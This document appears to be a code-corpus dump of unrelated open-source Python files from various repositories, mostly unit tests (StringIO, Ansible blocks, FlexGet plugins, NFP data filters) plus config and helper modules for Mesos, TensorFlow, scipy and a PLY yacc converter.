# Tests StringIO and cStringIO import unittest import StringIO import cStringIO import types import array import sys from test import test_support class TestGenericStringIO(unittest.TestCase): # use a class variable MODULE to define which module is being tested # Line of data to test as string _line = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!' # Constructor to use for the test data (._line is passed to this # constructor) constructor = str def setUp(self): self._lines = self.constructor((self._line + '\n') * 5) self._fp = self.MODULE.StringIO(self._lines) def test_reads(self): eq = self.assertEqual self.assertRaises(TypeError, self._fp.seek) eq(self._fp.read(10), self._line[:10]) eq(self._fp.read(0), '') eq(self._fp.readline(0), '') eq(self._fp.readline(), self._line[10:] + '\n') eq(len(self._fp.readlines(60)), 2) self._fp.seek(0) eq(self._fp.readline(-1), self._line + '\n') def test_writes(self): f = self.MODULE.StringIO() self.assertRaises(TypeError, f.seek) f.write(self._line[:6]) f.seek(3) f.write(self._line[20:26]) f.write(self._line[52]) self.assertEqual(f.getvalue(), 'abcuvwxyz!') def test_writelines(self): f = self.MODULE.StringIO() f.writelines([self._line[0], self._line[1], self._line[2]]) f.seek(0) self.assertEqual(f.getvalue(), 'abc') def test_writelines_error(self): def errorGen(): yield 'a' raise KeyboardInterrupt() f = self.MODULE.StringIO() self.assertRaises(KeyboardInterrupt, f.writelines, errorGen()) def test_truncate(self): eq = self.assertEqual f = self.MODULE.StringIO() f.write(self._lines) f.seek(10) f.truncate() eq(f.getvalue(), 'abcdefghij') f.truncate(5) eq(f.getvalue(), 'abcde') f.write('xyz') eq(f.getvalue(), 'abcdexyz') self.assertRaises(IOError, f.truncate, -1) f.close() self.assertRaises(ValueError, f.write, 'frobnitz') def test_closed_flag(self): f = self.MODULE.StringIO() self.assertEqual(f.closed, False) f.close() self.assertEqual(f.closed, True) f = self.MODULE.StringIO("abc") self.assertEqual(f.closed, False) 
f.close() self.assertEqual(f.closed, True) def test_isatty(self): f = self.MODULE.StringIO() self.assertRaises(TypeError, f.isatty, None) self.assertEqual(f.isatty(), False) f.close() self.assertRaises(ValueError, f.isatty) def test_iterator(self): eq = self.assertEqual unless = self.assertTrue eq(iter(self._fp), self._fp) # Does this object support the iteration protocol? unless(hasattr(self._fp, '__iter__')) unless(hasattr(self._fp, 'next')) i = 0 for line in self._fp: eq(line, self._line + '\n') i += 1 eq(i, 5) self._fp.close() self.assertRaises(ValueError, self._fp.next) def test_getvalue(self): self._fp.close() self.assertRaises(ValueError, self._fp.getvalue) @test_support.bigmemtest(test_support._2G + 2**26, memuse=2.001) def test_reads_from_large_stream(self, size): linesize = 2**26 # 64 MiB lines = ['x' * (linesize - 1) + '\n'] * (size // linesize) + \ ['y' * (size % linesize)] f = self.MODULE.StringIO(''.join(lines)) for i, expected in enumerate(lines): line = f.read(len(expected)) self.assertEqual(len(line), len(expected)) self.assertEqual(line, expected) self.assertEqual(f.read(), '') f.seek(0) for i, expected in enumerate(lines): line = f.readline() self.assertEqual(len(line), len(expected)) self.assertEqual(line, expected) self.assertEqual(f.readline(), '') f.seek(0) self.assertEqual(f.readlines(), lines) self.assertEqual(f.readlines(), []) f.seek(0) self.assertEqual(f.readlines(size), lines) self.assertEqual(f.readlines(), []) # In worst case cStringIO requires 2 + 1 + 1/2 + 1/2**2 + ... = 4 # bytes per input character. 
@test_support.bigmemtest(test_support._2G, memuse=4) def test_writes_to_large_stream(self, size): s = 'x' * 2**26 # 64 MiB f = self.MODULE.StringIO() n = size while n > len(s): f.write(s) n -= len(s) s = None f.write('x' * n) self.assertEqual(len(f.getvalue()), size) class TestStringIO(TestGenericStringIO): MODULE = StringIO def test_unicode(self): if not test_support.have_unicode: return # The StringIO module also supports concatenating Unicode # snippets to larger Unicode strings. This is tested by this # method. Note that cStringIO does not support this extension. f = self.MODULE.StringIO() f.write(self._line[:6]) f.seek(3) f.write(unicode(self._line[20:26])) f.write(unicode(self._line[52])) s = f.getvalue() self.assertEqual(s, unicode('abcuvwxyz!')) self.assertEqual(type(s), types.UnicodeType) class TestcStringIO(TestGenericStringIO): MODULE = cStringIO def test_array_support(self): # Issue #1730114: cStringIO should accept array objects a = array.array('B', [0,1,2]) f = self.MODULE.StringIO(a) self.assertEqual(f.getvalue(), '\x00\x01\x02') def test_unicode(self): if not test_support.have_unicode: return # The cStringIO module converts Unicode strings to character # strings when writing them to cStringIO objects. # Check that this works. f = self.MODULE.StringIO() f.write(u'abcde') s = f.getvalue() self.assertEqual(s, 'abcde') self.assertEqual(type(s), str) f = self.MODULE.StringIO(u'abcde') s = f.getvalue() self.assertEqual(s, 'abcde') self.assertEqual(type(s), str) self.assertRaises(UnicodeEncodeError, self.MODULE.StringIO, u'\xf4') import sys if sys.platform.startswith('java'): # Jython doesn't have a buffer object, so we just do a useless # fake of the buffer tests. 
buffer = str class TestBufferStringIO(TestStringIO): constructor = buffer class TestBuffercStringIO(TestcStringIO): constructor = buffer class TestMemoryviewcStringIO(TestcStringIO): constructor = memoryview def test_main(): test_support.run_unittest(TestStringIO, TestcStringIO) with test_support.check_py3k_warnings(("buffer.. not supported", DeprecationWarning)): test_support.run_unittest(TestBufferStringIO, TestBuffercStringIO) test_support.run_unittest(TestMemoryviewcStringIO) if __name__ == '__main__': test_main()
adamtiger/tensorflow
refs/heads/master
tensorflow/python/keras/datasets/boston_housing/__init__.py
73
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Boston housing price regression dataset.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from tensorflow.python.keras._impl.keras.datasets.boston_housing import load_data del absolute_import del division del print_function
AppMinistry/mesos-toolbox
refs/heads/master
lib/configs/mesos_config.py
2
import hashlib, os, sys, time from lib.utils import Utils from lib.configs.defaults import Defaults class MesosConfigMeta(type): _instances = {} def __call__(cls, *args, **kwargs): if cls not in cls._instances: cls._instances[cls] = super(MesosConfigMeta, cls).__call__(*args, **kwargs) return cls._instances[cls] class MesosConfig(object): __metaclass__ = MesosConfigMeta @staticmethod def setup(program): from lib.config import Config Config.add_argument( "command", help="Command to execute.", metavar="COMMAND", default="", choices=[ "build", "docker", "show-releases", "show-builds", "show-mesos-sources", "show-packaging-sources", "remove-build","remove-mesos-sources", "remove-packaging-sources", "check-this-system" ] ) Config.add_argument( "--mesos-version", dest="mesos_version", help="Mesos version to build.", metavar="MESOS_VERSION", default=Utils.env_with_default("MESOS_VERSION","") ) Config.add_argument( "--mesos-master-branch", dest="mesos_master_branch", help="Mesos master branch name.", metavar="MESOS_MASTER_BRANCH_NAME", default=Utils.env_with_default("MESOS_MASTER_BRANCH_NAME","master") ) Config.add_argument( "--os", dest="operating_system", help="Operating system to build mesos for.", metavar="OPERATING_SYSTEM", default=Utils.env_with_default("OPERATING_SYSTEM","") ) Config.add_argument( "--mesos-deb-packaging", dest="deb_packaging_repository", help="mesos-deb-packaging git repository to use.", metavar="MESOS_DEB_PACKAGING_REPOSITORY", default=Utils.env_with_default("MESOS_DEB_PACKAGING_REPOSITORY", "https://github.com/mesosphere/mesos-deb-packaging.git") ) Config.add_argument( "--mesos-deb-packaging-sha", dest="deb_packaging_sha", help="mesos-deb-packaging sha to use.", metavar="MESOS_DEB_PACKAGING_SHA", default=Utils.env_with_default("MESOS_DEB_PACKAGING_SHA", "41157b81ac6c523987695ac58416bc2b975552f2") ) Config.add_argument( "--mesos-git-repository", dest="mesos_git_repository", help="Mesos git repository to use.", metavar="MESOS_GIT_REPOSITORY", 
default=Utils.env_with_default("MESOS_GIT_REPOSITORY", "https://github.com/apache/mesos.git") ) Config.add_argument( "--mesos-build-version", dest="mesos_build_version", help="Mesos build version.", metavar="MESOS_BUILD_VERSION", default=Utils.env_with_default("MESOS_BUILD_VERSION", "0.1.{}".format( str(int(time.time())) ) ) ) Config.add_argument( "--docker-templates", dest="docker_templates_dir", help="Docker templates base directory.", metavar="DOCKER_TEMPLATES_DIR", default=Utils.env_with_default("DOCKER_TEMPLATES_DIR", "{}/docker/mesos".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--packaging-patches", dest="packages_patches_dir", help="mesos-deb-packaging patches directory.", metavar="PACKAGES_PATCHES_DIR", default=Utils.env_with_default("PACKAGES_PATCHES_DIR", "{}/patches/mesos-packaging".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--mesos-patches", dest="mesos_patches_dir", help="mesos patches directory.", metavar="MESOS_PATCHES_DIR", default=Utils.env_with_default("MESOS_PATCHES_DIR", "{}/patches/mesos".format( os.path.dirname(os.path.dirname(os.path.dirname(__file__))) ))) Config.add_argument( "--source-dir", dest="source_dir", help="Directory in which the Mesos sources are stored.", metavar="SOURCE_DIR", default=Utils.env_with_default("SOURCE_DIR", Defaults.mesos_sources_dir() ) ) Config.add_argument( "--packages-dir", dest="packages_dir", help="Directory in which packaged versions of Mesos are stored.", metavar="PACKAGES_DIR", default=Utils.env_with_default("PACKAGES_DIR", Defaults.mesos_packages_dir() ) ) Config.add_argument( "--work-dir", dest="work_dir", help="Directory in which this program does the work.", metavar="WORK_DIR", default=Utils.env_with_default("WORK_DIR", os.path.expanduser("~/.mesos-toolbox/mesos/temp") ) ) return Config.ready(program) @staticmethod def command(): from lib.config import Config return Config.args().command @staticmethod 
def mesos_version(): from lib.config import Config return Config.args().mesos_version @staticmethod def mesos_master_branch(): from lib.config import Config return Config.args().mesos_master_branch @staticmethod def operating_system(): from lib.config import Config return Config.args().operating_system @staticmethod def deb_packaging_repository(): from lib.config import Config return Config.args().deb_packaging_repository @staticmethod def deb_packaging_sha(): from lib.config import Config return Config.args().deb_packaging_sha @staticmethod def mesos_git_repository(): from lib.config import Config return Config.args().mesos_git_repository @staticmethod def mesos_build_version(): from lib.config import Config return Config.args().mesos_build_version @staticmethod def docker_templates_dir(): from lib.config import Config return Config.args().docker_templates_dir @staticmethod def packages_patches_dir(): from lib.config import Config return Config.args().packages_patches_dir @staticmethod def mesos_patches_dir(): from lib.config import Config return Config.args().mesos_patches_dir @staticmethod def source_dir(): from lib.config import Config Utils.cmd("mkdir -p {}".format(Config.args().source_dir)) return Config.args().source_dir @staticmethod def packages_dir(): from lib.config import Config path = "{}/mesos".format(Config.args().packages_dir) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def work_dir(): from lib.config import Config Utils.cmd("mkdir -p {}".format(Config.args().work_dir)) return Config.args().work_dir ## ## ADDITIONAL OPERATIONS: ## @staticmethod def mesos_git_repository_md5(): h = hashlib.md5() h.update(MesosConfig.mesos_git_repository()) return h.hexdigest() @staticmethod def deb_packaging_repository_md5(): h = hashlib.md5() h.update(MesosConfig.deb_packaging_repository()) return h.hexdigest() @staticmethod def mesos_repository_dir(): from lib.config import Config path = "{}/mesos/{}".format( Config.args().source_dir, 
MesosConfig.mesos_git_repository_md5() ) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def deb_packaging_repository_dir(): from lib.config import Config path = "{}/mesos-packaging/{}".format( Config.args().source_dir, MesosConfig.deb_packaging_repository_md5() ) Utils.cmd("mkdir -p {}".format(path)) return path @staticmethod def supported_operating_systems(): from lib.config import Config return Utils.list_supported_operating_systems(Config.args().docker_templates_dir)
jnewland/home-assistant
refs/heads/ci
tests/components/image_processing/common.py
18
"""Collection of helper methods. All containing methods are legacy helpers that should not be used by new components. Instead call the service directly. """ from homeassistant.components.image_processing import DOMAIN, SERVICE_SCAN from homeassistant.const import ATTR_ENTITY_ID from homeassistant.core import callback from homeassistant.loader import bind_hass @bind_hass def scan(hass, entity_id=None): """Force process of all cameras or given entity.""" hass.add_job(async_scan, hass, entity_id) @callback @bind_hass def async_scan(hass, entity_id=None): """Force process of all cameras or given entity.""" data = {ATTR_ENTITY_ID: entity_id} if entity_id else None hass.async_add_job(hass.services.async_call(DOMAIN, SERVICE_SCAN, data))
BellScurry/gem5-fault-injection
refs/heads/master
ext/ply/example/yply/yparse.py
165
# parser for Unix yacc-based grammars # # Author: David Beazley (dave@dabeaz.com) # Date : October 2, 2006 import ylex tokens = ylex.tokens from ply import * tokenlist = [] preclist = [] emit_code = 1 def p_yacc(p): '''yacc : defsection rulesection''' def p_defsection(p): '''defsection : definitions SECTION | SECTION''' p.lexer.lastsection = 1 print "tokens = ", repr(tokenlist) print print "precedence = ", repr(preclist) print print "# -------------- RULES ----------------" print def p_rulesection(p): '''rulesection : rules SECTION''' print "# -------------- RULES END ----------------" print_code(p[2],0) def p_definitions(p): '''definitions : definitions definition | definition''' def p_definition_literal(p): '''definition : LITERAL''' print_code(p[1],0) def p_definition_start(p): '''definition : START ID''' print "start = '%s'" % p[2] def p_definition_token(p): '''definition : toktype opttype idlist optsemi ''' for i in p[3]: if i[0] not in "'\"": tokenlist.append(i) if p[1] == '%left': preclist.append(('left',) + tuple(p[3])) elif p[1] == '%right': preclist.append(('right',) + tuple(p[3])) elif p[1] == '%nonassoc': preclist.append(('nonassoc',)+ tuple(p[3])) def p_toktype(p): '''toktype : TOKEN | LEFT | RIGHT | NONASSOC''' p[0] = p[1] def p_opttype(p): '''opttype : '<' ID '>' | empty''' def p_idlist(p): '''idlist : idlist optcomma tokenid | tokenid''' if len(p) == 2: p[0] = [p[1]] else: p[0] = p[1] p[1].append(p[3]) def p_tokenid(p): '''tokenid : ID | ID NUMBER | QLITERAL | QLITERAL NUMBER''' p[0] = p[1] def p_optsemi(p): '''optsemi : ';' | empty''' def p_optcomma(p): '''optcomma : ',' | empty''' def p_definition_type(p): '''definition : TYPE '<' ID '>' namelist optsemi''' # type declarations are ignored def p_namelist(p): '''namelist : namelist optcomma ID | ID''' def p_definition_union(p): '''definition : UNION CODE optsemi''' # Union declarations are ignored def p_rules(p): '''rules : rules rule | rule''' if len(p) == 2: rule = p[1] else: rule = p[2] # Print 
out a Python equivalent of this rule embedded = [ ] # Embedded actions (a mess) embed_count = 0 rulename = rule[0] rulecount = 1 for r in rule[1]: # r contains one of the rule possibilities print "def p_%s_%d(p):" % (rulename,rulecount) prod = [] prodcode = "" for i in range(len(r)): item = r[i] if item[0] == '{': # A code block if i == len(r) - 1: prodcode = item break else: # an embedded action embed_name = "_embed%d_%s" % (embed_count,rulename) prod.append(embed_name) embedded.append((embed_name,item)) embed_count += 1 else: prod.append(item) print " '''%s : %s'''" % (rulename, " ".join(prod)) # Emit code print_code(prodcode,4) print rulecount += 1 for e,code in embedded: print "def p_%s(p):" % e print " '''%s : '''" % e print_code(code,4) print def p_rule(p): '''rule : ID ':' rulelist ';' ''' p[0] = (p[1],[p[3]]) def p_rule2(p): '''rule : ID ':' rulelist morerules ';' ''' p[4].insert(0,p[3]) p[0] = (p[1],p[4]) def p_rule_empty(p): '''rule : ID ':' ';' ''' p[0] = (p[1],[[]]) def p_rule_empty2(p): '''rule : ID ':' morerules ';' ''' p[3].insert(0,[]) p[0] = (p[1],p[3]) def p_morerules(p): '''morerules : morerules '|' rulelist | '|' rulelist | '|' ''' if len(p) == 2: p[0] = [[]] elif len(p) == 3: p[0] = [p[2]] else: p[0] = p[1] p[0].append(p[3]) # print "morerules", len(p), p[0] def p_rulelist(p): '''rulelist : rulelist ruleitem | ruleitem''' if len(p) == 2: p[0] = [p[1]] else: p[0] = p[1] p[1].append(p[2]) def p_ruleitem(p): '''ruleitem : ID | QLITERAL | CODE | PREC''' p[0] = p[1] def p_empty(p): '''empty : ''' def p_error(p): pass yacc.yacc(debug=0) def print_code(code,indent): if not emit_code: return codelines = code.splitlines() for c in codelines: print "%s# %s" % (" "*indent,c)
perimosocordiae/scipy
refs/heads/master
scipy/signal/tests/mpsig.py
13
""" Some signal functions implemented using mpmath. """ try: import mpmath except ImportError: mpmath = None def _prod(seq): """Returns the product of the elements in the sequence `seq`.""" p = 1 for elem in seq: p *= elem return p def _relative_degree(z, p): """ Return relative degree of transfer function from zeros and poles. This is simply len(p) - len(z), which must be nonnegative. A ValueError is raised if len(p) < len(z). """ degree = len(p) - len(z) if degree < 0: raise ValueError("Improper transfer function. " "Must have at least as many poles as zeros.") return degree def _zpkbilinear(z, p, k, fs): """Bilinear transformation to convert a filter from analog to digital.""" degree = _relative_degree(z, p) fs2 = 2*fs # Bilinear transform the poles and zeros z_z = [(fs2 + z1) / (fs2 - z1) for z1 in z] p_z = [(fs2 + p1) / (fs2 - p1) for p1 in p] # Any zeros that were at infinity get moved to the Nyquist frequency z_z.extend([-1] * degree) # Compensate for gain change numer = _prod(fs2 - z1 for z1 in z) denom = _prod(fs2 - p1 for p1 in p) k_z = k * numer / denom return z_z, p_z, k_z.real def _zpklp2lp(z, p, k, wo=1): """Transform a lowpass filter to a different cutoff frequency.""" degree = _relative_degree(z, p) # Scale all points radially from origin to shift cutoff frequency z_lp = [wo * z1 for z1 in z] p_lp = [wo * p1 for p1 in p] # Each shifted pole decreases gain by wo, each shifted zero increases it. # Cancel out the net change to keep overall gain the same k_lp = k * wo**degree return z_lp, p_lp, k_lp def _butter_analog_poles(n): """ Poles of an analog Butterworth lowpass filter. This is the same calculation as scipy.signal.buttap(n) or scipy.signal.butter(n, 1, analog=True, output='zpk'), but mpmath is used, and only the poles are returned. """ poles = [-mpmath.exp(1j*mpmath.pi*k/(2*n)) for k in range(-n+1, n, 2)] return poles def butter_lp(n, Wn): """ Lowpass Butterworth digital filter design. 
This computes the same result as scipy.signal.butter(n, Wn, output='zpk'), but it uses mpmath, and the results are returned in lists instead of NumPy arrays. """ zeros = [] poles = _butter_analog_poles(n) k = 1 fs = 2 warped = 2 * fs * mpmath.tan(mpmath.pi * Wn / fs) z, p, k = _zpklp2lp(zeros, poles, k, wo=warped) z, p, k = _zpkbilinear(z, p, k, fs=fs) return z, p, k def zpkfreqz(z, p, k, worN=None): """ Frequency response of a filter in zpk format, using mpmath. This is the same calculation as scipy.signal.freqz, but the input is in zpk format, the calculation is performed using mpath, and the results are returned in lists instead of NumPy arrays. """ if worN is None or isinstance(worN, int): N = worN or 512 ws = [mpmath.pi * mpmath.mpf(j) / N for j in range(N)] else: ws = worN h = [] for wk in ws: zm1 = mpmath.exp(1j * wk) numer = _prod([zm1 - t for t in z]) denom = _prod([zm1 - t for t in p]) hk = k * numer / denom h.append(hk) return ws, h
Versent/ansible
refs/heads/devel
test/units/playbook/test_block.py
228
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.

# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

from ansible.playbook.block import Block
from ansible.playbook.task import Task

from ansible.compat.tests import unittest


class TestBlock(unittest.TestCase):
    """Unit tests for construction and loading of playbook Block objects."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_construct_empty_block(self):
        # A Block must be constructible with no arguments.
        b = Block()

    def test_construct_block_with_role(self):
        # placeholder — role-based construction not yet covered
        pass

    def test_load_block_simple(self):
        # Empty block/rescue/always sections load as empty task lists.
        ds = dict(
            block = [],
            rescue = [],
            always = [],
            #otherwise = [],
        )
        b = Block.load(ds)
        self.assertEqual(b.block, [])
        self.assertEqual(b.rescue, [])
        self.assertEqual(b.always, [])
        # not currently used
        #self.assertEqual(b.otherwise, [])

    def test_load_block_with_tasks(self):
        # Each section's task dicts must be deserialized into Task objects.
        ds = dict(
            block = [dict(action='block')],
            rescue = [dict(action='rescue')],
            always = [dict(action='always')],
            #otherwise = [dict(action='otherwise')],
        )
        b = Block.load(ds)
        self.assertEqual(len(b.block), 1)
        self.assertIsInstance(b.block[0], Task)
        self.assertEqual(len(b.rescue), 1)
        self.assertIsInstance(b.rescue[0], Task)
        self.assertEqual(len(b.always), 1)
        self.assertIsInstance(b.always[0], Task)
        # not currently used
        #self.assertEqual(len(b.otherwise), 1)
        #self.assertIsInstance(b.otherwise[0], Task)

    def test_load_implicit_block(self):
        # A bare list of task dicts loads as an implicit block.
        ds = [dict(action='foo')]
        b = Block.load(ds)
        self.assertEqual(len(b.block), 1)
        self.assertIsInstance(b.block[0], Task)
Antiun/yelizariev-saas
refs/heads/8.0
saas_server/models/res_config.py
8
from openerp import models, fields


class SaasServerWizard(models.TransientModel):
    """Settings wizard extending the base res.config.settings screen.

    Declares a new transient model name while inheriting all behavior from
    res.config.settings; no extra fields are added here.
    """
    _name = 'saas_server.config.settings'
    _inherit = 'res.config.settings'
jiahaoliang/group-based-policy
refs/heads/lbaasv2-mitaka-pull-request
gbpservice/neutron/tests/unit/nfp/configurator/lib/test_filter.py
1
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

import filter_base
from gbpservice.nfp.configurator.lib import data_filter
import mock

"""Test class to test data_filter.py using unittest framework
"""


class FilterTest(filter_base.BaseTestCase):
    # Exercises data_filter.Filter against the VPN/LB/FW fixtures provided by
    # filter_base.BaseTestCase (self.pools, self.vpnservices, etc.).

    def __init__(self, *args, **kwargs):
        super(FilterTest, self).__init__(*args, **kwargs)

    def setUp(self):
        """Prepare setup for every test case. """
        self.context = {}
        self.filter_obj = data_filter.Filter(None, None)

    def tearDown(self):
        """ Reset values after test case execution. """
        self.context = {}

    def _make_test(self, context, method, **filters):
        """ To reduce the boilerplate. """
        # NOTE(review): the `context` parameter is ignored — self.context is
        # used instead. Works because every caller mutates self.context via a
        # _make_*_service_context() helper first, but the signature misleads.
        retval = self.filter_obj.call(
            self.context,
            self.filter_obj.make_msg(method, **filters))
        return retval

    def _make_vpn_service_context(self):
        """Make the context for the vpn service

        Returns: vpn service context
        """
        service_info = self._test_get_vpn_info()
        self.context['service_info'] = service_info
        return self.context

    def _make_lb_service_context(self):
        """Make the context for the lb service

        Returns: lb service context
        """
        service_info = self._test_get_lb_info()
        self.context['service_info'] = service_info
        return self.context

    def _make_fw_service_context(self):
        """Make the context for the fw service

        Returns: fw service context
        """
        service_info = self._test_get_fw_info()
        self.context['service_info'] = service_info
        return self.context

    def test_make_msg(self):
        """Test make_msg() of data_filter.py """
        retval = self.filter_obj.make_msg('get_logical_device',
                                          pool_id=self.pools[0]['id'])
        self.assertEqual(retval,
                         {'method': 'get_logical_device',
                          'args': {'pool_id': self.pools[0]['id']}})

    def test_make_msg_empty(self):
        """Test make_msg() of data_filter.py """
        retval = self.filter_obj.make_msg('get_logical_device')
        self.assertEqual(retval,
                         {'args': {},
                          'method': 'get_logical_device'})

    def test_call(self):
        """Test call() of data_filter.py """
        # call() itself is mocked here, so this only verifies wiring.
        with mock.patch.object(self.filter_obj, "call") as call_mock:
            call_mock.return_value = True
            retval = self._make_test(self._make_lb_service_context(),
                                     'get_logical_device',
                                     pool_id=[self.pools[0]['id']])
            self.assertTrue(retval)

    def test_get_vpn_service_with_tenantid(self):
        """Test get_vpn_services() of data_filter.py by passing
        only tenant_id in filters
        """
        retval = self._make_test(
            self._make_vpn_service_context(),
            'get_vpn_services',
            filters=({'tenant_id': [self.vpnservices[0]['tenant_id']]}))
        self.assertEqual(retval,
                         [self.vpnservices[0], self.vpnservices[1]])

    def test_get_vpn_service_with_ids(self):
        """Test get_vpn_services() of data_filter.py by passing
        vpn service ids in filters
        """
        retval = self._make_test(self._make_vpn_service_context(),
                                 'get_vpn_services',
                                 ids=[self.vpnservices[0]['id'],
                                      self.vpnservices[1]['id']])
        self.assertEqual(retval,
                         [self.vpnservices[0], self.vpnservices[1]])

    def test_get_ipsec_conns(self):
        """Test get_ipsec_conns() of data_filter.py """
        retval = self._make_test(
            self._make_vpn_service_context(),
            'get_ipsec_conns',
            tenant_id=[self.ipsec_site_connections[0]['tenant_id']],
            peer_address=[self.ipsec_site_connections[0]['peer_address']])
        self.assertEqual(retval, self.ipsec_site_connections)

    def test_get_logical_device(self):
        """Test get_logical_device() of data_filter.py """
        retval = self._make_test(self._make_lb_service_context(),
                                 'get_logical_device',
                                 pool_id=self.pools[0]['id'])
        self.ports[0]['fixed_ips'] = self.subnets[1]
        self.vips[0]['port'] = self.ports[0]
        expected = {'pool': self.pools[0],
                    'vip': self.vips[0],
                    'members': self.members[0],
                    'healthmonitors': {}
                    }
        # NOTE(review): deliberately assertNotEqual — `expected` is mutated
        # after the call, so it should differ from retval. Verify intent.
        self.assertNotEqual(retval, expected)

    def test_get_vpn_servicecontext_ipsec_service_type(self):
        """Test get_vpn_servicecontext() of data_filter.py
        based on ipsec service type
        """
        service_info = self._test_get_vpn_info()
        self.context['service_info'] = service_info
        retval = self.filter_obj._get_vpn_servicecontext(
            self.context,
            {'tenant_id': self.vpnservices[0]['tenant_id'],
             'vpnservice_id': self.vpnservices[0]['id'],
             'ipsec_site_connections': self.ipsec_site_connections[0]['id']})
        expected = {'service': self.vpnservices[0],
                    'siteconns': [{'connection':
                                   self.ipsec_site_connections[0],
                                   'ikepolicy': self.ikepolicies[0],
                                   'ipsecpolicy': self.ipsecpolicies[0]
                                   }]}
        self.assertEqual(retval, [expected])

    def test_get_vpn_servicecontext_ipsec_service_type_with_tenantid(self):
        """Test get_vpn_servicecontext() of data_filter.py
        based on ipsec service type and tenant_id
        """
        service_info = self._test_get_vpn_info()
        self.context['service_info'] = service_info
        retval = self.filter_obj._get_vpn_servicecontext(
            self.context,
            {'tenant_id': self.vpnservices[0]['tenant_id'], })
        expected = {'service': self.vpnservices[0],
                    'siteconns': [{'connection':
                                   self.ipsec_site_connections[0],
                                   'ikepolicy': self.ikepolicies[0],
                                   'ipsecpolicy': self.ipsecpolicies[0]
                                   }]}
        self.assertEqual(retval, [expected])
Pretagonist/Flexget
refs/heads/develop
tests/test_pluginapi.py
2
from __future__ import unicode_literals, division, absolute_import

import os
import glob

import pytest

from flexget import plugin, plugins
from flexget.event import event, fire_event


class TestPluginApi(object):
    """
    Contains plugin api related tests
    """
    config = 'tasks: {}'

    def test_unknown_plugin(self):
        # Looking up a plugin that was never registered must raise.
        with pytest.raises(plugin.DependencyError):
            plugin.get_plugin_by_name('nonexisting_plugin')

    def test_no_dupes(self):
        plugin.load_plugins()
        assert plugin.PluginInfo.dupe_counter == 0, "Duplicate plugin names, see log"

    def test_load(self):
        plugin.load_plugins()
        plugin_path = os.path.dirname(plugins.__file__)
        # Count .py modules one and two levels under the plugins package.
        plugin_modules = set(os.path.basename(i) for k in ("/*.py", "/*/*.py")
                             for i in glob.glob(plugin_path + k))
        assert len(plugin_modules) >= 10, "Less than 10 plugin modules looks fishy"
        # Hmm, this test isn't good, because we have plugin modules that don't register a class (like cli ones)
        # and one module can load multiple plugins TODO: Maybe consider some replacement
        # assert len(plugin.plugins) >= len(plugin_modules) - 1, "Less plugins than plugin modules"

    def test_register_by_class(self, execute_task):
        # Plugin names are derived from the class names (snake_cased).
        class TestPlugin(object):
            pass

        class Oneword(object):
            pass

        class TestHTML(object):
            pass

        assert 'test_plugin' not in plugin.plugins

        @event('plugin.register')
        def rp():
            plugin.register(TestPlugin, api_ver=2)
            plugin.register(Oneword, api_ver=2)
            plugin.register(TestHTML, api_ver=2)

        # Call load_plugins again to register our new plugins
        plugin.load_plugins()

        assert 'test_plugin' in plugin.plugins
        assert 'oneword' in plugin.plugins
        assert 'test_html' in plugin.plugins


class TestExternalPluginLoading(object):
    # NOTE(review): the indentation of this YAML literal was reconstructed;
    # confirm nesting matches the original file.
    _config = """
        tasks:
          ext_plugin:
            external_plugin: yes
    """

    @pytest.yield_fixture()
    def config(self, request):
        # Point FLEXGET_PLUGIN_PATH at the external_plugins dir next to this
        # test file so load_plugins() discovers the sample plugin.
        os.environ['FLEXGET_PLUGIN_PATH'] = request.fspath.dirpath().join('external_plugins').strpath
        plugin.load_plugins()
        # fire the config register event again so that task schema is rebuilt with new plugin
        fire_event('config.register')
        yield self._config
        del os.environ['FLEXGET_PLUGIN_PATH']

    def test_external_plugin_loading(self, execute_task):
        # TODO: This isn't working because calling load_plugins again doesn't cause the schema for tasks to regenerate
        task = execute_task('ext_plugin')
        assert task.find_entry(title='test entry'), 'External plugin did not create entry'
nafex/pyload
refs/heads/stable
module/plugins/accounts/MegaRapidCz.py
6
